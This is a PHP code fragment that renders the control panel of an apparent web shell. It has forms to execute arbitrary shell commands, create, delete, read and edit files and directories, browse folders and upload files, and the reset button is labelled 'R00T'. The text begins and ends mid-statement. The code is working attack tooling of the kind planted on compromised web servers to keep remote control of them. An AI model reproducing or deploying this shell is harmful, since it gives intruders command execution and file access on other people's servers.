"; print $st.$c1." ".$mess3.$ec; print $c2.$sf."";input("text","cfile","",53); input("hidden","scdir",$nscdir,0);print " "; input("submit","crefile","Make-it",""); print " ";input("submit","delfile","Delete",""); print "".$ef.$ec.$et."	".$st.$c1; print " Enter the command to execute";print $ec; print $c2.$sf." "; input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print" "; input("submit","","Execute","");print " ".$ef.$ec.$et."	";print $st.$c1; print " $mess".$ec.$c2.$sf.""; input("text","dir","",53);input("hidden","scdir",$nscdir,0);print " "; input("submit","credir","Create-D","");print " "; input("submit","deldir","Delete-D",""); print "".$ef.$ec.$et."
";print $st.$c1; print " Edit/Read File".$ec;print $c2.$sf.""; input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print " "; input("submit","","Read-Edit","");print "".$ef.$ec.$et."	";print $st.$c1; print " View Dir ";print $ec.$c2.$sf." "; input("text","scdir",$nscdir,59);print" "; input("submit","","View","");print " "; input("reset","","R00T","");print " ".$ef.$ec.$et."	";print $st.$c1; print " File size : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2.""; input("file","upfile","",40);input("hidden","scdir",$nscdir,0); input("hidden","up",$nscdir,0); print" ";input("submit","","Upload","");print "".$ef.$ec.$et."